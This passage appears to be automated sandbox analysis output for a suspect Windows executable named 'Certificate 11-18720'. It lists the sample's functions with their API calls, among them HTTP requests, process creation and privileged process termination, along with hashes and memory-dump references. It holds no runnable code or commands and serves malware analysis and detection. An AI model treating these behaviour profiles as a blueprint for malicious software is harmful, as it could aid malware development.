                                                                                    • Opcode Fuzzy Hash: 10dcd25ebc1bb7019651755daf5e4f8f6252aefd69e2320b70fb271dd721ff5b
                                                                                    • Instruction Fuzzy Hash: 449138346002068FC719EF94C899F68FBA5FF45304F5492ADE40AAB262DF31AE56CF54
                                                                                    Function 005DCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 005DCC15
                                                                                      • Part of subcall function 005DCCCD: GetClientRect.USER32(?,?), ref: 005DCCF6
                                                                                      • Part of subcall function 005DCCCD: GetWindowRect.USER32(?,?), ref: 005DCD37
                                                                                      • Part of subcall function 005DCCCD: ScreenToClient.USER32(?,?), ref: 005DCD5F
                                                                                    • GetDC.USER32 ref: 0063D137
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0063D14A
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063D158
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0063D16D
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0063D175
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0063D200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 972d55517de2741d5cbd0852f652c7724ce0b202429941443f77a642a3abad49
                                                                                    • Instruction ID: afb04493a8aa99a32d7812e47b61e6f4fdb2a06c2944f4a43e9c887a82e972a7
                                                                                    • Opcode Fuzzy Hash: 972d55517de2741d5cbd0852f652c7724ce0b202429941443f77a642a3abad49
                                                                                    • Instruction Fuzzy Hash: 5471CE31400205EFCF219F68D885AEA7FB6FF49350F14466AED555A3A6D7318C81DFA0
                                                                                    Function 006145C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006145FF
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0061462B
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0061466D
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00614682
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0061468F
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006146BF
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00614706
                                                                                      • Part of subcall function 00615052: GetLastError.KERNEL32(?,?,006143CC,00000000,00000000,00000001), ref: 00615067
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 1241431887-3916222277
                                                                                    • Opcode ID: d16a564472b981837d9d774877c7af0fac1ed33dbef49dbae910a180c8103f6a
                                                                                    • Instruction ID: 7c5a359b5173c2ec25282261111412931d2949925c84cfa59c58356f1636ef98
                                                                                    • Opcode Fuzzy Hash: d16a564472b981837d9d774877c7af0fac1ed33dbef49dbae910a180c8103f6a
                                                                                    • Instruction Fuzzy Hash: 2A417FB5901205BFEB019F50CC85FFB77AEFF0A358F08401AFA059B181DBB099858BA4
                                                                                    Function 0061B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0065DC00), ref: 0061B715
                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0065DC00), ref: 0061B749
                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0061B8C1
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0061B8EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                    • String ID:
                                                                                    • API String ID: 560350794-0
                                                                                    • Opcode ID: 9a8dbf87026487b9706ab57ef554ba12d0eb99b702a4d17044f0fd9efbed185a
                                                                                    • Instruction ID: 17463648196c5a3cb1807730b1377c6952be8f0777cf259c68afd6bc9f07427a
                                                                                    • Opcode Fuzzy Hash: 9a8dbf87026487b9706ab57ef554ba12d0eb99b702a4d17044f0fd9efbed185a
                                                                                    • Instruction Fuzzy Hash: B6F11A75A00109AFCF04DF94C884EEEBBBAFF89715F148458F905AB250DB71AD86CB90
                                                                                    Function 006224D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006224F5
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00622688
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006226AC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006226EC
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0062270E
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0062286F
                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006228A1
                                                                                    • CloseHandle.KERNEL32(?), ref: 006228D0
                                                                                    • CloseHandle.KERNEL32(?), ref: 00622947
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4090791747-0
                                                                                    • Opcode ID: 569b7024a733d6729e1fc104cfd27578481654177a72193b6a28872b2d93e116
                                                                                    • Instruction ID: f5b9027abf849a2bd91c94cee1ccde1b3af29a8423061cf86957c39c4855bcd3
                                                                                    • Opcode Fuzzy Hash: 569b7024a733d6729e1fc104cfd27578481654177a72193b6a28872b2d93e116
                                                                                    • Instruction Fuzzy Hash: 41D1BF31604652AFC714EF24D8A5B6ABBE2BF85310F14845DF8899B3A2DB30DC45CF52
                                                                                    Function 0062B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0062B3F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: f24e321e0799059feceb5b38bb74451524f80703d5a842e8e3fa47d5786412a6
                                                                                    • Instruction ID: e8a8eb8efa83675c2d1a6a94cedacf1f136fe0058440eb226189e154170f9eee
                                                                                    • Opcode Fuzzy Hash: f24e321e0799059feceb5b38bb74451524f80703d5a842e8e3fa47d5786412a6
                                                                                    • Instruction Fuzzy Hash: DA51A630500A25BBEF20AF18EC89B9D7BA7FB05314F246116F615EA2E2D771E9408F55
                                                                                    Function 005DA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0063DB1B
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063DB3C
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0063DB51
                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0063DB6E
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0063DB95
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0063DBA0
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0063DBBD
                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,005DA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0063DBC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 1268354404-0
                                                                                    • Opcode ID: 823d7c2a5ac60fdd91febff11cfc5ed95e2f18f80f6c2123b36da01c774d440d
                                                                                    • Instruction ID: 2e1390ba7c4adec2aa8ee19195c59b2ba6fc2a23d7bbc893f4d2b37df4135ecf
                                                                                    • Opcode Fuzzy Hash: 823d7c2a5ac60fdd91febff11cfc5ed95e2f18f80f6c2123b36da01c774d440d
                                                                                    • Instruction Fuzzy Hash: 9D516970A00209EFDB24DF68DC81FAA7BBAFB48350F10061AF94696390D770ED90DB90
                                                                                    Function 00607555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00605FA6,?), ref: 00606EF1
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006075CA
                                                                                    • _wcscmp.LIBCMT ref: 006075E2
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 006075FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 793581249-0
                                                                                    • Opcode ID: c2c0641dc131aee38d361782f01e51e8912362ada72dd78ac5bb2b0ff3a1f0e4
                                                                                    • Instruction ID: 98f1a22c43e99a4edd24cb0d1fd4f43179640374df0b2bc2885efac4e4a0ca65
                                                                                    • Opcode Fuzzy Hash: c2c0641dc131aee38d361782f01e51e8912362ada72dd78ac5bb2b0ff3a1f0e4
                                                                                    • Instruction Fuzzy Hash: 615162B2E492295ADF68EB94DC459DE73BDAF48310F10409AF609E3181EA70E7C5CF64
                                                                                    Function 005DEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 005DEAEB
                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 005DEB32
                                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 0063DC86
                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0063DAD1,00000004,00000000,00000000), ref: 0063DCF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: 4d0e5b8237a9420db2e9179b0105006f231a5c06e902b7694e8e61f9922f782b
                                                                                    • Instruction ID: 2d8bbb88e34ee5a079b6a93eb453d1d005b42670223aa4cc051682a3583cea1e
                                                                                    • Opcode Fuzzy Hash: 4d0e5b8237a9420db2e9179b0105006f231a5c06e902b7694e8e61f9922f782b
                                                                                    • Instruction Fuzzy Hash: 4A41D970615680AAE736672C9D8FA6A7E9BBF43305F19280FE0874E761D6717880D711
                                                                                    Function 005FB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB26C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB273
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005FAEF1,00000B00,?,?), ref: 005FB288
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB290
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB293
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005FAEF1,00000B00,?,?), ref: 005FB2A3
                                                                                    • GetCurrentProcess.KERNEL32(005FAEF1,00000000,?,005FAEF1,00000B00,?,?), ref: 005FB2AB
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,005FAEF1,00000B00,?,?), ref: 005FB2AE
                                                                                    • CreateThread.KERNEL32(00000000,00000000,005FB2D4,00000000,00000000,00000000), ref: 005FB2C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: 41eb8d205cb3ba6556edb94c04aa883346429fae888175d72258dbf3b9ca37ca
                                                                                    • Instruction ID: fcee04bce20f12da48cf1c85c1143d1e549912c8dc866900c4ebdf0ce5f7b328
                                                                                    • Opcode Fuzzy Hash: 41eb8d205cb3ba6556edb94c04aa883346429fae888175d72258dbf3b9ca37ca
                                                                                    • Instruction Fuzzy Hash: 8401C9B9640308BFE710AFA5DC4DF6B7BADEB8AB11F019411FA05DB1A1CA759810CB61
                                                                                    Function 0061C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 713d5acda4419788c079294197c61c3ec31af33daecaae09aa84d9f4ac63e350
                                                                                    • Instruction ID: 1552ab5b1b4f5f2611a1089a3552534c8e5807d0d26acee4513123bd97fe341b
                                                                                    • Opcode Fuzzy Hash: 713d5acda4419788c079294197c61c3ec31af33daecaae09aa84d9f4ac63e350
                                                                                    • Instruction Fuzzy Hash: 94E19371A4021AAFDF14DFA4D885BEE77B6EF48764F188029E905A7381D770AD81CB90
                                                                                    Function 006116DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                      • Part of subcall function 005DC6F4: _wcscpy.LIBCMT ref: 005DC717
                                                                                    • _wcstok.LIBCMT ref: 0061184E
                                                                                    • _wcscpy.LIBCMT ref: 006118DD
                                                                                    • _memset.LIBCMT ref: 00611910
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X$p2gl2g
                                                                                    • API String ID: 774024439-3511325126
                                                                                    • Opcode ID: 71d9f7ee26c42642f3eb029dc6749366754d2de780c9d46b4f98533b224c8d69
                                                                                    • Instruction ID: c9938d07bd90c5dcf584ca787155e09b80a21679aa74a20a80a8b5b8c7359eee
                                                                                    • Opcode Fuzzy Hash: 71d9f7ee26c42642f3eb029dc6749366754d2de780c9d46b4f98533b224c8d69
                                                                                    • Instruction Fuzzy Hash: 6CC1A0355043429FC724EFA4C859F9ABBE1BF85350F04492DF9899B2A2DB30ED45CB82
                                                                                    Function 00629A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00629B19
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00629B2D
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00629B47
                                                                                    • _wcscat.LIBCMT ref: 00629BA2
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00629BB9
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00629BE7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: b4094d02f01928c9b84f75b576a79a1ec5f3cec18a73d785a7c5c2cf47fad0fd
                                                                                    • Instruction ID: 9abc80f2414c79ee7432c775ef3f4a15957abce2ffa04406b220abcc192f6343
                                                                                    • Opcode Fuzzy Hash: b4094d02f01928c9b84f75b576a79a1ec5f3cec18a73d785a7c5c2cf47fad0fd
                                                                                    • Instruction Fuzzy Hash: 1441B471A00318ABDB219FA4DC85BEE77FAEF48350F10442AF589A7291D7719D85CB60
                                                                                    Function 0062172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00606532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00606554
                                                                                      • Part of subcall function 00606532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00606564
                                                                                      • Part of subcall function 00606532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006065F9
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062179A
                                                                                    • GetLastError.KERNEL32 ref: 006217AD
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006217D9
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00621855
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00621860
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00621895
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: 5c4e27ac0332c9c7f124f7fee32a7a9ac14f6dcad2314d1d7b67d84048bfac32
                                                                                    • Instruction ID: b17c9632f0361fcbc2a4647efd2e18f52a6cc603ebb49f16862b15ea5eac3e15
                                                                                    • Opcode Fuzzy Hash: 5c4e27ac0332c9c7f124f7fee32a7a9ac14f6dcad2314d1d7b67d84048bfac32
                                                                                    • Instruction Fuzzy Hash: 7241CC71600211AFDB05EF54D8A9FAE7BA2BFA5710F048059F9069F3D2DB78A900CF91
                                                                                    Function 00605819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
